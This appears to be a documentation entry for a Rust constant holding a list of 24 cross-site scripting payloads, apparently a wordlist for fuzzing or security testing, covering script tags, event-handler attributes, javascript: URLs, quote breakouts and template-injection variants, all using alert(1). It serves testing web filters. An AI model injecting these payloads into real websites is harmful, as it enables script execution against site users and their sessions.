Constant XSS 

pub const XSS: &str = "<script>alert(1)</script>\n<img src=x onerror=alert(1)>\n<svg onload=alert(1)>\n<body onload=alert(1)>\njavascript:alert(1)\n\"><script>alert(1)</script>\n\'><script>alert(1)</script>\n<ScRiPt>alert(1)</ScRiPt>\n<iframe src=javascript:alert(1)>\n<input onfocus=alert(1) autofocus>\n<select onfocus=alert(1) autofocus>\n<textarea onfocus=alert(1) autofocus>\n<marquee onstart=alert(1)>\n<details open ontoggle=alert(1)>\n<audio src=x onerror=alert(1)>\n<video src=x onerror=alert(1)>\n\'-alert(1)-\'\n\\\'-alert(1)//\n</script><script>alert(1)</script>\nonerror=alert;throw 1\n{alert(1)}\nconstructor.constructor(\'alert(1)\')()\n{{constructor.constructor(\'alert(1)\')()}}\n<img src=# onerror=\"alert(1)\">";

Cross-site scripting payloads (24 patterns)